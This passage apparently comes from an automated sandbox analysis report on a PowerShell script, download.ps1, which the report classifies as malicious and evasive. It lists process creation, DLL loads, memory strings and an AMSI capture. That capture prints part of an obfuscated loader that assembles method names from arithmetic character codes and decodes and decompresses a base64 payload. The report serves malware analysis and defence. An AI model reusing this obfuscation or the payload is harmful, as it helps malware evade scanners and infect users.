Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
Source: powershell.exe, 00000000.00000002.2154207173.000001C010011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.2191669510.000001C01E6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E8BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ25UtEaFXxMsfU42-5TvWFbQ_5bsfWsZ" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="GftoqWXMObjIEQBfsjleVg">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="GftoqWXMObjIEQBfsjleVg">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="GftoqWXMObjIEQBfsjleVg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="GftoqWXMObjIEQBfsjleVg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.closest("[data-ved]"))?D(f)||"":"";f=f||"";if(a.hasAttribute("jsname"))a=a.getAttribute("jsname");else{var C;a=(C=a.closest("[jsname]"))==null?void 0:C.getAttribute("jsname")}google.log("rcm","&ei="+c+"&tgtved="+f+"&jsname="+(a||""))}}else F=a,E=[c]}window.document.addEventListener("DOMContentLoaded",function(){document.body.addEventListener("click",G)});}).call(this);</script></body></html>k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="GftoqWXMObjIEQBfsjleVg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engineClassification label: mal80.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3snjqncv.mjz.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $lhtqkx4yvsiruwc.(([system.String]::new(@((5049-4982),(627483/(4208+(6652780/(9373-4769)))),(9283-(16530-(912+(14289-(2986+4856))))),(-5475+(-2076+7672)),(-2442+(389+2137)),(-5148+(1516+(2611+1132)))))))( $3lmdr2ef1q5wuyo ) $lhtqkx4yvsiruwc.(([system.String]::new(@((19631/293),(6125-(3417656/(13+555))),(-4266+(36981273/(6370546/(-7292+8046)))),(598115/5201),(981114/9714)))))()$u1hvkyp4it758or.((-join (@((1539-(9918336/(8587-1849))),(-1664+(4037-(-4854+(-121+7240)))),(-4029+(-1141+5281)),(778780/(13230-6458)),(8152-(12208-(35604705/(7824+(3322-2581))))))| ForEach-Object { [char]$_ })))()[byte[]] $wpomj64s8297hun = $3lmdr2ef1q5wuyo.(([char[]]@((9501-9417),(1533-(9241-7819)),(126295/1943),(-8580+8694),(3917-(-5618+(9525-(-6135+(8260436/(10737640/(53404350/(-1885+(17824-9354))))))))),(8468-(7912+459)),(-3877+(-2182+(12248760/1982)))) -join ''))() $ojwmxa16ngbrdyp=$wpomj64s8297hun return $ojwmxa16ngbrdyp}[System.Text.Encoding]::ascii.(([char[]]@((-5937+6008),(-5638+5739),(-6878+6994),(211401/2547),(-7969+8085),(4961-4847),(-8111+8216),(193490/(-411+2170)),(870350/(51054900/(1855+(1831+2356))))) -join ''))((1yngw5vd3a6l2x8opbk0zjtu4sf "c79hM3hnNWZnctf1N7t09A3iqiUjjZsu9OwO4RYR6ElB+mIejgisNZrgCW4hsrH/VBZQcHYAETT0jeQBgZ4qPRfB3eLRs2PwUuk8iI45XosoDQuFZ8+G18NAIpGMT4OEvYMmnbd5SZGBl9Glr9fSFP/wsmG0JR15iztH/ddpGsmN7oaenNGwxov4G9jcDgCRgspWPS+MSliYob+9C+M+tLPYaLvYyAQfFk+W8sO66xmekqvTp5vWyp7ozpuJOfHlw5n0zRn4t62IrIF4V0uM4+4aHhuqQ689ksgI7DupCAof2UzZgF+HXXFJk58CARGZyccaXU2fh4MHhScd5EGwpO6b39XoyMBKcoT8V7fKVLvMt4PU+GzyDSYc+guSvO/EZ2jl/RUcKjULGdWvwp3YlZbQSMpdwqiyjq4jPM5/QzS1D44rG7qwpv0aMKndpGr0M0wpGjPIfA3UHa74tUggMgujnd2PpJVBovoejIdao5qZt9F5O7POhIcRQB8VjKdZM0kcTYAWuptf/Qp/5+B5yarViw54BKLJ+6yRWouqTtXzvQ+DQlEXvVEFVvFxuZZD3bX5aRRJWJ0x6XWg65m+qZ6Nl5E/ytyClmba/B6lt6eUTvk1nqA3Yc/A4ba+pCiPC+tKbFML7EPUE0c1Muf66b6BtqjpidZX+1xi3ODtprb0JaVyqtQ2h/58a9W4lSCl9p/a3OyF5tSELrGshe+AndnwgyL04Ww6Lv/F/C8Asju1Ko6O2THX60A9mLLaYhmxNoJ6bBOSZAE1lmFQ2hoaFoQmUqIEynnpt5IQSZRu8qI4lwdL1Ip/LI33v82VuCTz27POBq4Lrm3iUSAdiA1shMsCVsnpNeEznCR+Q2l42e195aR8p42AK9846RySkaO773OSoNOs3qWKvSWylpP27PKq6BwbzEGXmur6JP84Qln8TgWSnuqI9s9woq2+rwTx9t/E96gda9WE21Fw+V/jOGmg+kP0rimidxN8xndSVTCtJeV81TC8qaBA45FCg4UkKEX50Lf66JuoscepG0LWTRwyb5SY+biVXIOaovstvHW3Q1457b61DAWwyNgCq/A5fZtA2mimuka/ktJrSMaZoyEdGaIDHOa3hd1uv5tbzSefYllLRx4yDC3TRkwqQom4Psy2+p0oCnrN7QUVmszSVA+Qs++cj46Cw8PWDETf74td9P9xZdjzLre4nymRg/p5Fkezo+WgMBUMGXBNYjdXh5YMQtdx9Ev6Hl5nLvAt918RMIJy3C3odv/AW17YPhM5leQq7I76fcuDvNxJjMjAXsKIjU6lxJQ9O9C90tG5UOQZmfzx1UPe1a6D1BR0DllmYVehRQnMybQpISrtw305KVJWNuYPib5pZ0Q93yFjbz14ilph1ol2rVbkofhCdBveN36kJZ75pWDJRIrQ3fHxhRoLdW7VICxAP8j+3bhOV20nRRkHr8yVM5Jpjd1OwgOrcCQsZ2qSV3bUc2zo8JhBZoXcVsEn1psRYBhcIb89PHCoF/kzYEXhlg1o3DKzwwidVNp7Cs9iinArJizfuiKxxVfcCjk/jIHTa7u/2lRY2mqPzEOX8+nG3Fg4f3g/4mPEnKP8ZJcLFkNY63iCg3bXCxDPAKdf5KkxIUBt9cCvzAtnAWSe+Tz9Y04H6ujrTwsYilrMifzcoHrpnZhoO8l7Ej+c62y/9P9d/CMJpmqVs1vvLYIpPOxXOtmldn18atT7tCH8NhvJGav6Yd00l65v63lLCXKUhGc8tXB2sK0dWi0CaQx57L5xpRdJqfR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1ReversingLabs: Detection: 13%
Source: download.ps1Virustotal: Detection: 14%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.2209390732.000001C026E25000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2207985331.000001C026CFD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2206179543.000001C0266E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2207985331.000001C026CFD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2206179543.000001C0266E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2153725167.000001C00C712000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2207985331.000001C026CF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2153725167.000001C00C712000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2207985331.000001C026D9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2206179543.000001C0266E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089R source: powershell.exe, 00000000.00000002.2207985331.000001C026CFD000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848D7D2A5 pushad ; iretd 0_2_00007FF848D7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F6C8F4 push ss; ret 0_2_00007FF848F6C8F7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8491471AB push edx; retf 0_2_00007FF8491471CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF8491489F0 pushad ; ret 0_2_00007FF8491489F1

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
